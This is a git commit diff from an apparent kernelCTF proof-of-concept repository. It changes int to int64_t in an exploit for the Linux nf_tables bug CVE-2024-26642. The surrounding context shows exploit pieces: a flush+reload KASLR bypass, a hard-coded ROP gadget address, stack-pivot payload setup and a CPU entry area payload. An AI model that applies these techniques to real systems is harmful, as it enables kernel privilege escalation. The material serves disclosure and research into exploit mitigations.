Solve comments

conlonial · conlonial · commit 3999bb5c249a · 2025-03-16T13:22:06.000+08:00
diff --git a/pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/exploit
diff --git a/pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/exploit.c
@@ -124,7 +124,7 @@ void primitive_decrease_nft_chain_use(struct nl_sock *socket, char *table, char
     free(pad);
 }
 
-void exploit(int kernel_off){
+void exploit(int64_t kernel_off){
     //fd to spray payloads
     int spray_fd;
     spray_fd = socket(AF_INET, SOCK_STREAM, 0);
@@ -214,7 +214,7 @@ void exploit(int kernel_off){
 int main(void) {
     sandbox();
     pin_on_cpu(0);
-    int kernel_off = bypass_kaslr(0);
+    int64_t kernel_off = bypass_kaslr(0);
     setup_registers(&payload,kernel_off);
     setup_rop_chain(&payload,kernel_off);
     exploit(kernel_off);
diff --git a/pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/poc.h b/pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/poc.h
@@ -117,7 +117,7 @@ u64 add_rsp_0x88 = 0xffffffff810ebbdd;
 //
 
 // just use side channels
-int bypass_kaslr(u64 base);
+int64_t bypass_kaslr(u64 base);
 
 // CPU entry area pointers. We prepare some memory here that will be referenced
 // by the ROP chains.
@@ -179,7 +179,7 @@ struct payload {
 static u32 rop_chain_rsi[6] = {};
 static struct payload payload = {};
 
-void setup_registers(struct payload* payload, int kernel_off) {
+void setup_registers(struct payload* payload, int64_t kernel_off) {
   // this function sets up the part of the payload which sets up the nft_regs structure
   // in nft_do_chain.
   // essentially we copy a stack pivot gadget into them
@@ -209,7 +209,7 @@ void setup_registers(struct payload* payload, int kernel_off) {
   payload->handle = 0xDEAD;
 }
 
-void setup_rop_chain(struct payload* payload, int kernel_off) {
+void setup_rop_chain(struct payload* payload, int64_t kernel_off) {
   payload->fake_expr.fake_ops = PAYLOAD_LOCATION(HELPER_CPU) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);
 
   // top of stack points contains &payload->fake_expr
@@ -304,7 +304,7 @@ static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) {
 
 // Fill the CPU entry area exception stack of HELPER_CPU with a
 // struct cpu_entry_area_payload
-static void setup_cpu_entry_area(int kernel_off) {
+static void setup_cpu_entry_area(int64_t kernel_off) {
   if (fork()) {
     return;
   }
@@ -531,7 +531,7 @@ size_t flushandreload(void* addr) // row miss
   return delta;
 }
 
-int bypass_kaslr(u64 base) {
+int64_t bypass_kaslr(u64 base) {
     if (!base) {
       #ifdef KASLR_BYPASS_INTEL
         #define OFFSET 0
